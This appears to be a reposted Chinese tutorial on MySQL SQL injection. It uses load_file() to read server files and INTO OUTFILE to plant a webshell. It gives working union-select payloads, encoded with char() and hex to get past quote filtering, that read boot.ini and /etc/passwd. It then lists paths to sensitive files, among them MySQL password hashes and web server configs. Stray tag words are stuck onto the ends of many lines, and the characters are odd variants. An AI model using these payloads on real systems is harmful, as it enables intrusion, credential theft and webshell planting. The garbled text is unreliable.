load_file函数只有知足两个条件就可使用:php
一、文件权限:chmod a+x pathtofilemysql
二、文件大小: 必须小于max_allowed_packetlinux
例子:web
select load_file('D:\xampp\htdocs\www\wanju\htaccess.txt')sql
select load_file('/etc/hosts')shell
例如上面的例子是有条件限制的:数据库
一、必须有权限读取而且文件必须彻底可读。apache
and (select count(*) from mysql.user)>0 /*若是结果返回正常,说明具备读写权限.*/windows
and (select count(*) from mysql.user)>0 /* 返回错误,应该是管理员给数据库帐户降权了*/安全
二、欲读取文件必须在服务器上
三、必须指定文件完整的路径
四、欲读取文件必须小于max_allowed_packet
若是该文件不存在,或由于上面的任一缘由而不能被读出,函数返回空。比较难知足的就是权限。
在windows下,若是NTFS设置得当,是不能读取相关的文件的,当遇到administrators才能访问的文件,
users就不能实现用load_file读取文件了。
在实际的注入中,咱们有两个难点须要解决:
一、绝对物理路径。
二、构造有效的畸形语句。
在不少PHP程序中,当提交一个错误的查询时,若是display_errors=on,程序就会暴露web目录的绝对路径,只有知道
路径,那么对于一个能够注入的PHP程序来讲,整个服务器的安全将受到严重的威胁。
利用:
咱们假设一个程序的SQL语句以下:
select * from article where articleid=$id (当前条件:magic_quotes_gpc = off, c:/boot.ini可读)
此时,咱们构造$id为:
-1 union select 1,1,1,1,load_file('c:/boot.ini')
咱们的查询语句就变成:
select * from article where articleid=-1 union select 1,1,1,1,load_file('c:/boot.ini')
程序就会把c:/boot.ini内容老老实实显示出来,可是如今magic_quotes_gpc=off的主机少之又少,怎么才能构造处没有
引号的语句呢?
看过<<SQL Injection with MySQL>>的朋友确定知道用char()函数或者把字符转换成16进制。
注:当前条件为magic_quotes_gpc=on, c:/boot.ini可读。
咱们构造$id为:
-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))
"char(99,58,47,98,111,111,116,46,105,110,105)"就是“c:/boot.ini"的ASCII代码。
咱们的查询语句就变成:
select * from article where articleid=-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))
这样咱们也能够成功读取boot.ini文件,还有把字符转换为16进制的:
"c:/boot.ini"的十六进制是"0x633a2f626f6f742e696e69",因此上面的语句就变成:
select * from article where articleid=-1 union select 1,1,1,load_file(0x633a2f626f6f742e696e69)
固然,在实际应用中,因为种种条件限制,文件的内容未必会显示出来,咱们能够用into outfile把文件导出。
关于mysql into outfile注射,要使用into outfile 把代码写到web目录取得webshell首先须要3大先天条件:
一、知道物理路径(into outfule '物理路径'), 这样才能写对目录。
二、可以使用union (须要mysql 3以上的版本)
三、对方没有对(')进行过滤(由于outfile后面的('')不能够用其余函数代替转换)
后天条件须要二个:
一、就是mysql用户拥有file_priv权限(否则就不能写文件或读文件)
二、对web目录有写权限MS的系统就不说了,通常都会有权限的,可是*nix的系统,一般都是rwxr-xr-x,也就是
说组跟其余用户都没有权限写操做,因此,要知足这5大条件仍是蛮高难度的。
mysql的load_file()常见的用法:
一、replace(load_file(0×2F6574632F706173737764), 0x3c, 0x20)
二、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一些php文件里彻底显示代码。有些时候不替换一些字符,如"<"替换成"空格",返回的是网页。
而没法查看到代码。
三、load_file(char(47))能够列出FreeBSD, Sunos系统根目录。
四、/etc/httpd/conf/httpd.conf或者/usr/local/apache/conf/httpd.conf查看linux apache虚拟主机配置文件。
五、c:/Program Files/Apache Group/Apache/conf/httpd.conf或c:/apache/conf/httpd.conf 查看windows系统
apache文件。
六、c:/Resin-3.0.14/conf/resin.conf 或c:/Resin/conf/resin.conf 查看jsp开发网站的resin文件配置信息。
七、/usr/local/resin/conf/resin.cof 查看linux系统配置的JSP虚拟主机
八、d:/apache/apache2/conf/httpd.conf
九、c:/Program Files/mysql.my.ini
十、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径
十一、c:/windows/system32/inetsrv/MetaBase.xml 查看IIS的虚拟主机配置文件
十二、/usr/local/resin-3.0.22/conf/resin.conf 或/usr/local/resin-pro-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
1三、/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
1四、/etc/sysconfig/iptables 查看防火墙策略
1五、usr/local/app/php5/lib/php.ini PHP 的设置
1六、/etc/my.cnf MYSQL的配置文件
1七、/etc/redhat-release 红帽子的系统版本
1八、c:/mysql/data/mysql/user.MYD 存在MYSQL系统中的用户密码
1九、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.
20、/usr/local/app/apache2/conf/extra/httpd-vhosts.conf 虚拟网站设置
2一、c:/windows/my.ini
参考链接:https://m.aliyun.com/yunqi/ziliao/22820